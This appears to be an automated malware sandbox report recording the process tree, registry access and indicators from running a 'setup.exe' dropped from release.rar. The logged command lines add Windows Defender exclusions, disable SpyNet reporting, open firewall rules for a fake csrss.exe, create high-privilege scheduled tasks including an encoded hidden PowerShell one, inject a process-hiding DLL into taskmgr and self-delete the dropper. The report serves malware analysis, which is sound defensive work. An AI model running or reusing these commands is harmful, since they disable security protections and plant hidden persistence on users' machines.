PID 4164 wrote to memory of 5720	4164	setup.exe	338
PID 4164 wrote to memory of 5720	4164	setup.exe	338
PID 4164 wrote to memory of 5720	4164	setup.exe	338
PID 5324 wrote to memory of 5740	5324	UzKIBfmjFNozZXyrAyTGxD4s.exe	162
PID 5324 wrote to memory of 5740	5324	UzKIBfmjFNozZXyrAyTGxD4s.exe	162
PID 5324 wrote to memory of 5740	5324	UzKIBfmjFNozZXyrAyTGxD4s.exe	162
PID 4164 wrote to memory of 5784	4164	setup.exe	301
PID 4164 wrote to memory of 5784	4164	setup.exe	301
PID 4164 wrote to memory of 5784	4164	setup.exe	301
PID 4164 wrote to memory of 5792	4164	setup.exe	164
PID 4164 wrote to memory of 5792	4164	setup.exe	164
PID 4164 wrote to memory of 5792	4164	setup.exe	164
PID 4164 wrote to memory of 5852	4164	setup.exe	165
PID 4164 wrote to memory of 5852	4164	setup.exe	165
PID 4164 wrote to memory of 5852	4164	setup.exe	165
PID 4164 wrote to memory of 5864	4164	setup.exe	166
PID 4164 wrote to memory of 5864	4164	setup.exe	166
PID 4164 wrote to memory of 5864	4164	setup.exe	166
PID 4164 wrote to memory of 4444	4164	setup.exe	169
PID 4164 wrote to memory of 4444	4164	setup.exe	169
PID 4164 wrote to memory of 4444	4164	setup.exe	169
PID 5740 wrote to memory of 4132	5740	UzKIBfmjFNozZXyrAyTGxD4s.tmp	170
PID 5740 wrote to memory of 4132	5740	UzKIBfmjFNozZXyrAyTGxD4s.tmp	170
PID 5740 wrote to memory of 4132	5740	UzKIBfmjFNozZXyrAyTGxD4s.tmp	170

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OlHIbQCQzMDwcktuUDGh8kb_.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OlHIbQCQzMDwcktuUDGh8kb_.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\release.rar
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\release.rar"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4556

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4528

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:4584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\release.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:952

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\release.rar" -trar
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3100

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\release.rar" -t7z
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2200

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\release.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4540

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\release.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2304

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4164
- C:\Users\Admin\Documents\GuardFox\N0ycQ3j_C9A6WtSTJQw2tiLl.exe
  "C:\Users\Admin\Documents\GuardFox\N0ycQ3j_C9A6WtSTJQw2tiLl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2248
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5800
- - C:\Users\Admin\Documents\GuardFox\N0ycQ3j_C9A6WtSTJQw2tiLl.exe
    "C:\Users\Admin\Documents\GuardFox\N0ycQ3j_C9A6WtSTJQw2tiLl.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:5936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:4056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:4900
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3984
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:5720
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:5396
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Manipulates WinMonFS driver.
      PID:548
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4316
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:5776
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:5344
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5176
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3436
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2356
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        Executes dropped EXE
        
        PID:2580
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:6116
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:812
- C:\Users\Admin\Documents\GuardFox\v0xDTuqvEPa9a6ZvVWNtlOgW.exe
  "C:\Users\Admin\Documents\GuardFox\v0xDTuqvEPa9a6ZvVWNtlOgW.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  PID:2264
- C:\Users\Admin\Documents\GuardFox\OBLAwvm9ivOuzAxhr7WPxFVM.exe
  "C:\Users\Admin\Documents\GuardFox\OBLAwvm9ivOuzAxhr7WPxFVM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2076
- - C:\Users\Admin\AppData\Local\Temp\7zS2598.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\7zS3112.tmp\Install.exe
      .\Install.exe /rdidrWWLU "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:3176
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:2336
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:5192
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:3144
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:1452
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:3212
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:5772
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:2356
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:6124
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gJlYJAhaC" /SC once /ST 00:42:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:2148
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gJlYJAhaC"
        5⤵
        
        PID:5944
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gJlYJAhaC"
        5⤵
        
        PID:5228
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbINNCpbpKlDtqWtmu" /SC once /ST 22:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV\NbBDRdHfNISsgbl\EaxuNLp.exe\" Y6 /ytsite_idveE 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:3436
- C:\Users\Admin\Documents\GuardFox\GOGiZZ7TyIhDAlIeP5sfGlZO.exe
  "C:\Users\Admin\Documents\GuardFox\GOGiZZ7TyIhDAlIeP5sfGlZO.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5196
- - C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
    C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:3476
  - - C:\Users\Admin\AppData\Local\Temp\2.3.1.1.exe
      C:\Users\Admin\AppData\Local\Temp\2.3.1.1.exe
      4⤵
      Blocklisted process makes network request
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5344
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1660
        5⤵
        Program crash
        
        PID:3788
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5816
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 1692
        5⤵
        Program crash
        
        PID:856
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1060
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5376
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1700
        5⤵
        Program crash
        
        PID:5124
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1776
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 1696
        5⤵
        Program crash
        
        PID:1312
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3952
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1056
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:6128
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 1700
        5⤵
        Program crash
        
        PID:5296
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:524
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 1692
        5⤵
        Program crash
        
        PID:364
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1688
        5⤵
        Program crash
        
        PID:3428
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:3456
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 1700
        5⤵
        Program crash
        
        PID:2132
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 1708
        5⤵
        Program crash
        
        PID:5556
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5652
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1992
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 1684
        5⤵
        Program crash
        
        PID:4976
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4216
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1680
        5⤵
        Program crash
        
        PID:2368
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1768
        5⤵
        Program crash
        
        PID:5160
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3256
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:444
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 1696
        5⤵
        Program crash
        
        PID:4164
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3460
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 1696
        5⤵
        Program crash
        
        PID:3792
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4912
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 1700
        5⤵
        Program crash
        
        PID:3216
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1824
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 1692
        5⤵
        Program crash
        
        PID:5292
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3248
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 1684
        5⤵
        Program crash
        
        PID:1360
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4052
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 1680
        5⤵
        Program crash
        
        PID:1912
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:964
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1700
        5⤵
        Program crash
        
        PID:5652
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5944
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 1700
        5⤵
        Program crash
        
        PID:5236
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:716
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 1680
        5⤵
        Program crash
        
        PID:5916
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3208
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 1692
        5⤵
        Program crash
        
        PID:5900
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 1696
        5⤵
        Program crash
        
        PID:1884
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5820
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 1680
        5⤵
        Program crash
        
        PID:8
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4292
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2932
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 1672
        5⤵
        Program crash
        
        PID:5532
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 1688
        5⤵
        Program crash
        
        PID:5916
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4916
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1680
        5⤵
        Program crash
        
        PID:3796
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4376
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 1680
        5⤵
        Program crash
        
        PID:860
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2868
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 1700
        5⤵
        Program crash
        
        PID:3180
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:6128
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5244
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 1688
        5⤵
        Program crash
        
        PID:3620
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:772
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1940
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 1680
        5⤵
        Program crash
        
        PID:5684
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4948
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1692
        5⤵
        Program crash
        
        PID:4936
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1544
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 1700
        5⤵
        Program crash
        
        PID:1192
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5012
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5084
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1676
        5⤵
        Program crash
        
        PID:5196
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2392
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1692
        5⤵
        Program crash
        
        PID:1632
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4960
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 1696
        5⤵
        Program crash
        
        PID:1420
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 1692
        5⤵
        Program crash
        
        PID:5116
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1704
        5⤵
        Program crash
        
        PID:1664
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1700
        5⤵
        Program crash
        
        PID:3852
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 1684
        5⤵
        Program crash
        
        PID:1152
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4656
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1696
        5⤵
        Program crash
        
        PID:3436
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1908
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 1692
        5⤵
        Program crash
        
        PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Documents\GuardFox\GOGiZZ7TyIhDAlIeP5sfGlZO.exe"
    3⤵
    PID:2592
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:3740
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 864
    3⤵
    - Program crash
    PID:5188
- C:\Users\Admin\Documents\GuardFox\20OAIXUdr4wvUDcH8dpdDTfg.exe
  "C:\Users\Admin\Documents\GuardFox\20OAIXUdr4wvUDcH8dpdDTfg.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5216
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5636
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5836
- C:\Users\Admin\Documents\GuardFox\JynMWOEPU4IgIbVkKO84zcFB.exe
  "C:\Users\Admin\Documents\GuardFox\JynMWOEPU4IgIbVkKO84zcFB.exe"
